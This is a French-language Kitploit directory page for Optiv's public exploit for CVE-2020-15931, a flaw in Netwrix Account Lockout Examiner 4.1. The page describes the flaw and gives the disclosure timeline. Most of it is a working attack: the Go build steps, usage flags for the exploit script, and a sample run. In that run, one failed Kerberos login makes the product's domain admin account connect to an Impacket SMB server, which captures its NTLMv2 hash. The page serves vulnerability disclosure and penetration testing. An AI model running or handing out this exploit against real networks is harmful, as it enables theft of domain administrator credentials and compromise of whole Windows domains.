Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 Vulnérabilité de divulgation des informations d'identification du compte administrateur de domaine | Kitploit
Outils/GitHubGitHub/optiv/cve-2020-15931
Analyse des VulnérabilitésExploitationCollecte d'InformationsTests d'IntrusionRed Teaming
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Vulnérabilité de divulgation des informations d'identification du compte administrateur de domaine

Voir le dépôt
285il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Vulnérabilité de divulgation des identifiants du compte administrateur de domaine

Aperçu de la vulnérabilité

Netwrix Account Lockout Examiner (ALE) avant la version 5.1 permet à un adversaire distant non authentifié de déclencher une connexion vers un système contrôlé par l'attaquant et de capturer la réponse NTLMv1/v2 d'un compte disposant de privilèges d'administrateur de domaine. Le compte administrateur de domaine serait déjà configuré avec le produit comme requis pour l'installation. Un adversaire peut exploiter cela en générant un seul événement Kerberos Pre-Authentication Failed (Event ID 4771) sur un contrôleur de domaine.

Plus de détails sur la vulnérabilité peuvent être trouvés sur le blog suivant Blog

image

Crédits

La vulnérabilité a été découverte dans la nature par Robert Surace (@robsauce) et Daniel Min (@bigb0ss), consultants en sécurité chez Optiv, lors d'une évaluation de sécurité. Après l'identification de CVE-2020-15931, Optiv a immédiatement contacté Netwrix pour divulguer le défaut identifié de manière responsable.

Chronologie de divulgation de la vulnérabilité

  • 9 juin 2020 – Vulnérabilité découverte par Optiv
  • 15 juin 2020 – Divulguée par Optiv au fournisseur
  • 14 juillet 2020 – Le fournisseur a reconnu le problème et a accepté de publier la version corrigée
  • 23 juillet 2020 – Divulguée au CNA (MITRE Corporation)
  • 24 juillet 2020 – Le fournisseur a publié la version corrigée de Netwrix Account Lockout Examiner 5.1
  • 24 juillet 2020 – CVE-2020-15931 attribué par le CNA (MITRE Corporation)
  • 13 août 2020 – Divulguée au public
  • 30 octobre 2020 – Score de base 7.5 (Élevé) attribué par le NVD (National Vulnerability Database)

Script d'exploitation

Installation

Le script d'exploitation a été développé en golang. Installez les dépendances suivantes :

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

Il utilise également smbserver.py d'Impacket.

root@kitploit:~
pip install impacket

Enfin, téléchargez le script d'exploitation et compilez-le.

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

Utilisation

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

Exploitation

(Note : Au moment de la rédaction, cette attaque ne peut être identifiée que par une attaque aveugle. En effet, il est difficile de déterminer si l'organisation cible utilise Netwrix Account Lockout Examiner sur son réseau pour auditer les authentifications de comptes ou non.)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

Références

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

Télécharger l’outil